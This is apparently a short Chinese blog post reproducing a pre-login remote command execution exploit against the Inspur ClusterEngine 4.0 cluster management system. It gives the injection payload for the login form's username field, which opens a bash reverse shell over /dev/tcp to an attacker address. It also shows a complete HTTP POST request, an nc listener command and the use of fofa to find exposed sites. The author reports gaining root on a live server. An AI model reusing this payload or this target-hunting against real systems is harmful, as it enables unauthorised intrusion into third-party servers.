# 浪潮 ClusterEngine4.0 集群管理系统前台 RCE
正当我又是在摸鱼的时候,空白( crazygod )发来了浪潮 ClusterEngine4.0 集群管理系统前台 RCE 的 payload,嗯?那我这不得直接去复现?说干就干,fofa 一波,
payload:
1 2 3
| POST /login
op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{反弹shellIP}%2F80%200%3E%261`
|
找了几个站点均抓包失败,想必是修复了,一抓包就服务器连接失败,我这脾气,直接下一个,终于到了一个可以抓包的了
首先需要 vps 开启监听 nc -lvp 3344
然后开始登陆抓包,构造 payload,go
post 数据包如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /login HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Origin: https://ip Connection: close Referer: https://ip/module/login/login.html Cookie: lang=cn
op=login&username=1%202\',\'1\'\);`bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F***.**.**.***%2F3344%200%3E%261`
|
发包成功获取 root 权限
至于原理咱也不是很懂,导致命令执行,源码啥的我也没去看过,只能等空白大佬带我们分析分析了